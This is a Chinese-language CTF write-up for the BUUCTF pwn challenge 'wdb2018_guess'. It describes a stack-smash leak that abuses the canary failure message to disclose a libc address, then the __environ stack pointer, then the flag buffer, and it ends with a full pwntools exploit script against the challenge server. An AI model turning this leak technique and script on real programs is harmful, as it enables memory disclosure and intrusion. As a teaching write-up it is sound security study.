[BUUCTF-pwn]——wdb2018_guess
这个漏洞叫什么来着, 好像是stack smash, 具体就是主动触发canary保护来达到自己的目的.
这道题最后我也有一个小疑问, 这个程序为什么会莫名其妙执行三次. 嘶!!!
一个常见的保护开启NX canary RELRO
在IDA中看看, 那个buf就是我们要的flag
先主动触发一下canary看看会发送什么. 输出的是argv[0], 同时程序会再次执行,发现会重复执行三次.
思路
思路来了
- 利用主动触发canary保护, 调用___stack_chk_fail函数, leek出一个地址
- 找到对应的libc版本
- 在libc中保存了一个函数叫_environ,存的是当前进程的环境变量,通过_environ的地址得到_environ的值,从而得到环境变量地址,环境变量保存在栈中,所以通过栈内的偏移量,可以访问栈中任意变量, 当然也可以找到我们栈上的数据, 找到buf的地址
- 利用buf的地址打印flag
- 找到多长payload才可以泄露出我们想要的数据0x128
exploit
from pwn import * from LibcSearcher import * #p = process('./GUESS') p = remote('node3.buuoj.cn',27072) elf = ELF('./GUESS') puts_got = elf.got['puts'] p.sendlineafter('Please type your guessing flag','a'*0x128 + p64(puts_got)) p.recvuntil('stack smashing detected *: ') puts_addr = u64(p.recv(6).ljust(8,'\x00')) libc = LibcSearcher('puts',puts_addr) libc_base = puts_addr - libc.dump('puts') log.success('libc_base :' + hex(libc_base)) environ = libc_base + libc.dump('__environ') info('environ_addr=',hex(environ)) p.sendlineafter('Please type your guessing flag','a'*0x128 + p64(environ)) p.recvuntil('stack smashing detected *: ') buf_addr = u64(p.recv(6).ljust(8,'\x00')) - 0x168 log.success('flag_addr=',hex(buf_addr)) p.sendlineafter('Please type your guessing flag','a'*0x128 + p64(buf_addr)) p.interactive() 讯享网
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容,请联系我们,一经查实,本站将立刻删除。
如需转载请保留出处:https://51itzy.com/kjqy/123775.html